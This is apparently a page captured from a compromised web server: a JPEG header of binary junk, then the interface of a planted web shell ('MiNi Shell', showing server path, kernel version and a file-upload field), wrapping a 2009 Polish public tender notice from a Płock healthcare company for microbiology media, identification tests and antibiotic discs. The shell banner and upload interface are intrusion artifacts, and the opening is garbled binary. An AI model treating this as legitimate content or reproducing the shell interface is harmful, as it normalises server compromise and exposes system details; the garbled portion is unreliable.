JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090728/121865-N-2009.html

<p class="kh_header"><b>Płock: ZAKUP I DOSTAWA ODCZYNNIKÓW I PRODUKTÓW 
DO DIAGNOSTYKI MIKROBIOLOGICZNEJ</b><br>
<b>Numer ogłoszenia: 121865 - 2009; data zamieszczenia: 28.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Płocki Zakład Opieki Zdrowotnej Sp. z o.o. , ul. Kościuszki 28, 09-402 Płock, woj. mazowieckie, tel. 024 3645100, 3645124, faks 024 3645102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpzoz-plock.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA ODCZYNNIKÓW I PRODUKTÓW 
DO DIAGNOSTYKI MIKROBIOLOGICZNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa odczynników i produktów do diagnostyki mikrobiologicznej według poniższego zakresu.
Pakiet Nr 1 - Podłoża bakteriologiczne i testy identyfikacyjne w tym: I. Podłoża do posiewów krwi, II. Podłoża bakteriologiczne - gotowe na płytkach, III. Testy identyfikacyjne, IV. Szybkie testy diagnostyczne do identyfikacji bakterii.
Pakiet Nr 2- Produkty do diagnostyki mikrobiologicznej w tym: I. Krążki antybiotykowe i diagnostyczne do różnicowania drobnoustrojów, II. Podłoża bakteriologiczne nie uwodnione - suche.

Przedmiot zamówienia musi spełniać następujące wymagania:
a.dotyczące przedmiotu zamówienia:
Zamawiający zastrzega, iż ilość odczynników i produktów do diagnostyki mikrobiologicznej mogą ulec zmniejszeniu w okresie realizacji zamówienia;
termin ważności dla odczynników  i produktów do diagnostyki mikrobiologicznej - zgodnie z Załącznikiem Nr 4 do SIWZ; 
zestawienie parametrów wymaganych odczynników i produktów do diagnostyki mikrobiologicznej stanowi Załącznik Nr 4 do SIWZ. Niespełnienie któregokolwiek z parametrów spowoduje odrzucenie oferty;
dostarczone artykuły powinny być pełnowartościowe i wyprodukowane zgodnie z obowiązującymi normami i standardami;
b.dotyczące terminów realizacji zamówienia:
sukcesywnie przez okres 12 miesięcy od dnia podpisania umowy, w ciągu max 7 dni od dnia złożenia zamówienia w formie telefonicznej lub faksem, z wyjątkiem zamówień na cito w ciągu max 24 godz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.81.00-0, 33.69.65.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenia zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 pkt. 1 - 10 oraz art. 24 ust. 2 pkt. 1 - 4 ustawy Prawo zamówień publicznych.
2.	Posiadają uprawnienia do wykonywania określonej działalności w zakresie objętym przedmiotem zamówienia.
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że:
a.	warunek określony w pkt. 1) spełnia każdy z Wykonawców,
b.	warunek określony w pkt. 2) spełnia każdy z Wykonawców,
c.	warunek określony w pkt. 3) spełniają łącznie wszyscy Wykonawcy,
d.	warunek określony w pkt. 4) spełniają łącznie wszyscy Wykonawcy.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia nie spełnia, na podstawie dokumentów wymienionych poniżej. Wykonawcą może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty występujące wspólnie. Wykonawcy występujący wspólnie (spółki cywilne, konsorcja) ponoszą solidarną odpowiedzialność za wykonanie zamówienia.
Wykonawca poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty. Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty.
Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w PLN.
W niniejszym postępowaniu Zamawiający nie będzie żądał zabezpieczenia należytego wykonania umowy.
Nie ustanawia się dynamicznego systemu zakupów.
Nie przewiduje się wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku, o którym mowa, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Postępowanie o udzielenie zamówienia publicznego jest jawne. Protokół wraz z załącznikami jest jawny. Załączniki do protokołu udostępnia się po dokonaniu wyboru najkorzystniejszej oferty lub unieważnieniu postępowania, z tym że oferty udostępnia się od chwili ich otwarcia. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli Wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą one być udostępnione (zastrzeżenie należy dołączyć do oferty). Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy. 
Udostępnienie treści protokołu oraz otwartych ofert odbywać się będzie wg poniższych zasad:
a.Zamawiający udostępni wskazane dokumenty po złożeniu pisemnego wniosku.
b.Zamawiający wyznaczy termin, miejsce oraz zakres udostępnianych dokumenów i informacji.
c.Zamawiający wyznaczy członka Komisji Przetargowej w obecności, którego udostępnione zostaną dokumenty.
d.Zamawiający umożliwi kopiowanie udostępnionych dokumentów i informacji odpłatnie. Za wykonanie kserokopii dokumentów oraz za ich przesłanie Wykonawcy listownie Zamawiający będzie pobierał opłatę w wysokości określonej w Zarządzeniu Prezesa Zarządu Spółki Płocki Zakład Opieki Zdrowotnej Sp. z o.o.
e.Wskazane we wniosku dokumenty postępowania będą udostępnione wyłącznie w siedzibie Zamawiającego oraz w czasie godzin jego urzędowania, tj. w godzinach 7:30-15:05.
f.Bez zgody Zamawiającego zabrania się wykonywania zdjęć złożonych ofert.
g.W sprawach nieuregulowanych zastosowanie mają przepisy ustawy oraz rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 roku w sprawie protokołu postępowania o udzielenie zamówienia publicznego (Dz.U. Nr 188, poz. 1154).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.	Do oferty należy załączyć następujące oświadczenia i dokumenty w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy - Załącznik  Nr 2 do SIWZ - na potwierdzenie warunków Rozdział III pkt. 1 - 4.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem, wystawione nie wcześniej niż 6 m - cy przed upływem terminu składania ofert - na potwierdzenie warunków Rozdział III pkt. 1 i 2.
3.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - na potwierdzenie warunków Rozdział III pkt. 1 i 2.
II.	Do oferty należy załączyć również:
1.	Wypełniony Formularz cenowy - Załącznik Nr 3 do SIWZ.
2.	Wypełniony Załącznik Nr 4 do SIWZ - Parametry wymagane.
3.	Zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom tj. deklarację zgodności wyrobu medycznego z określonymi dla niego wymaganiami zasadniczymi wystawioną przez wytwórcę lub autoryzowanego przedstawiciela.
4.	Materiały informacyjne w języku polskim opisujące przedmiot zamówienia będące oficjalnymi katalogami, folderami, ulotkami reklamowymi itp. stosowanymi w powszechnych stosunkach handlowych, potwierdzające zgodność deklarowanych parametrów z danymi producenta. Przedmiotowe materiały mają:
a.	uwzględniać skład podłóż oraz charakterystyki wzrostu,
b.	zawierać dokładną charakterystykę testów identyfikacyjnych,
c.	zawierać dokładnej charakterystyki testów lateksowych,
d.	uwzględniać asortyment krążków antybiotykowych i diagnostycznych z opisem poszczególnych pozycji.
5.	Certyfikat, że oferowany produkt spełnia warunki ustawy o wyrobach medycznych, oraz posiada znak CE.
6.	Certyfikat ISO 9001:2000, Certyfikat ISO 13485.
7.	Zgodność z normą - EN 12322 (kontrola jałowości) - dotyczy Pakiet Nr 1 Podłoża bakteriologiczne i testy identyfikacyjne - pkt., 2, 3 oraz Pakiet Nr 2 - Produkty do diagnostyki mikrobiologicznej pkt. 1.
8.	Certyfikat zgodności ze standardem ISO 11133 - dotyczy Pakiet Nr 2 Produkty do diagnostyki mikrobiologicznej - pkt. 2.
9.	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.
10.	Oświadczenie, że Wykonawca:
a.	nie zleci wykonania przedmiotu zamówienia podwykonawcom, a całość prac wykona w ramach działań swojego przedsiębiorstwa 
lub
b.	zamierza powierzyć wykonanie części zamówienia podwykonawcom. Zamawiający żąda wskazania części zamówienia, której wykonanie zamierza powierzyć podwykonawcom (formularz oferty - Załącznik Nr 1 do SIWZ).
11.	Próbki, wraz z ich wykazem, oferowanych produktów. 
 
W przypadku złożenia oferty wspólnej pełnomocnictwo musi zawierać jednoznaczne upoważnienie do zaciągania zobowiązań, podpisywania umowy i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, podpisane przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. Termin, na jaki została zawarta umowa Wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.
Pełnomocnictwo, o którym mowa w pkt. II. 9, musi zostać dołączone do oferty w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.
Dokumenty, o których mowa w pkt, I. 1 - 3 winien załączyć każdy z przedsiębiorców składających ofertę wspólną.
Dokumenty wymienione w pkt. I. 2 - 3 i II. 3, 5 - 8 należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej stosuje się do przepisów paragrafu 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605 z poźn. zm.).
Zamawiający wezwie Wykonawców, którzy nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne będzie unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowany przedmiot zamówienia wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
Zamawiający może także w wyznaczonym przez siebie terminie, wezwać do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 30</li>
<li>2 - Jakość - 70</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.ipzp.pl/SZPZOZ-Plock.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> strony internetowej www.przetargi.ipzp.pl/SZPZOZ-Plock oraz w siedzibie Zamawiającego tj.: Płocki Zakład Opieki Zdrowotnej Sp. z o.o., ul. Kościuszki 28, 09 - 402 Płock.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 09:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - Płocki Zakład Opieki Zdrowotnej Sp. z o.o., 09 - 402 Płock, ul. Kościuszki 28 w  pokoju Nr 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - Podłoża bakteriologiczne i testy identyfikacyjne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Podłoża do posiewów krwi
Lp.	Artykuł	Szacunkowa ilość w okresie 12      m - cy
1.	Podłoże do posiewów krwi - do hodowli bakterii tlenowych i grzybów	200 butelek
2.	Podłoże do posiewów krwi - do hodowli bakterii beztlenowych	200 butelek
3.	Podłoże pediatryczne do posiewu krwi	200 butelek

II. Podłoża bakteriologiczne - gotowe na płytkach 
Lp.	Artykuł	Szacunkowa ilość w okresie 12      m - cy
1.	Columbia CNA agar z 5% krwią baranią	24 op.
2.	Columbia agar z 5% krwią baranią	60 op.
3.	Agar czekoladowy dla pałeczek Haemophilus	12 op.
4.	Agar Gardnerella	12 op.
5.	Podłoże chromogenne ESBL	10 op.
6.	Płytki odciskowe z podłożem Count-Tact	6 op.
7.	Podłoże chromogenne VRE	4 op.
8.	Podłoze chromogenne CPS do posiewu moczu	10 op.
9.	Podłoże do identyfikacji paciorkowców grupy B	6 op.
10.	Mueller -Hinton  2 agar	180 op.

III. Testy identyfikacyjne 
Lp.	Artykuł	Szacunkowa ilość w okresie 12      
m - cy
1.	API_A	3 op.x25 testów
2.	API-E	4 op. x 25 testów
3.	API- STAPH	3 op. x 25 testów
4.	API-20C AUX	3 op. x 25 testów
5.	ATB FUNGUS 3	2 op. x 25 testów

IV. Szybkie testy diagnostyczne do identyfikacji bakterii
Lp.	Artykuł	Szacunkowa ilość w okresie 12      m - cy
1.	Slidex Staph Kit	5 op. x 250 oznaczeń
2.	Slidex Strepto Kit	4 op. x 50 oznaczeń
3.	GENbox anaer	20op. x 10 testów
4.	Test Chlamydia	2 op. x 25 testów.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.81.00-0, 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Jakość - 70</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - Produkty do diagnostyki mikrobiologicznej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Krążki antybiotykowe i diagnostyczne do różnicowania drobnoustrojów
Lp.	Artykuł	Szacunkowa ilość w okresie 12      m - cy
1.	Optochina	18 x 50krążków
2.	Krążki SPS	16 x 50krążków
3.	Paski diagnostyczne z czynnikiem V	3 x 50pasków
4.	Paski diagnostyczne z czynnikami X i V	3 x 50pasków
5.	Penicylina	15 x 50krążków
6.	Ampicylina	40 x 50krążków
7.	Amoksycylina z kwasem klawulanowym	40 x 50krążków
8.	Ampicylina z sulbaktamem	2 x 50krążków
9.	Piperacylina	10 x 50krążków
10.	Piperacylina z tazobaktamem	10 x 50krążków
11.	Tikarcylina	3 x 50krążków
12.	Tikarcylina z kwasem klawulanowym	3 x 50krążków
13.	Cefalotyna	40 x 50krążków
14.	Cefuroksym	30 x 50krążków
15.	Ceftazidym	40 x 50krążków
16.	Cefotaksym 	40 x 50krążków
17.	Ceftriakson	6 x 50krążków
18.	Cefepim	3 x 50krążków
19.	Imipenem	6 x 50krążków
20.	Meropenem	6 x 50krążków
21.	Aztreonam	2 x 50krążków
22.	Cefoksytyna	40 x 50krążków
23.	Oksacylina	4 x 50krążków
24.	Erytromycyna	20 x 50krążków
25.	Klindamycyna	20 x 50krążków
26.	Doksycyklina	30 x 50krążków
27.	Tetracyklina 	5 x 50krążków
28.	Gentamicyna	50 x 50krążków
29.	Gentamicyna	6 x 50krążków
30.	Streptomycyna	6 x 50krążków
31.	Ciprofloksacyna	40 x 50krążków
32.	Norfloksacyna	20 x 50krążków
33.	Nitrofurantoina	20 x 50krążków
34.	Kotrimoksazol	50 x 50krążków
35.	Wankomycyna	6 x 50krążków
36.	Teikoplanina	6 x 50krążków
37.	Neomycyna	20 x 50krążków
38.	Chloramfenikol	30 x 50krążków
39.	Furazolidon	30 x 50krążków
40.	Mupirocyna 	6 x 50krążków
41.	linezolid	4 x 50krążków
42.	Synercid	4 x 50krążków
43.	Rifampicyna	2 x 50krążków
44.	Kwas fusydowy	2 x 50krążków

II. Podłoża bakteriologiczne nie uwodnione - suche
Lp.	Artykuł	Szacunkowa ilość w okresie 12      m - cy
1.	Podłoże Mueller-Hinton 2 agar	8op.x500g
2.	Schaedler agar	1op.x500g
3.	Mac Conkey agar	12op.x500g
4.	Salmonella -Shigella agar	5op.x500g
5.	Blood Agar Base	20op.x500g
6.	Levine Eosin Methylene Blue Agar	4op.x500g
7.	Agar granulowany	4op.x500g
8.	Bulion BHI-D	2op.x500g
9.	Difco Selenite Broth	2op.x500g
10.	Difco Yeast Extract Glucose Chloramfenikol Agar	1op.x500g.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.81.00-0, 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Jakość - 70</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com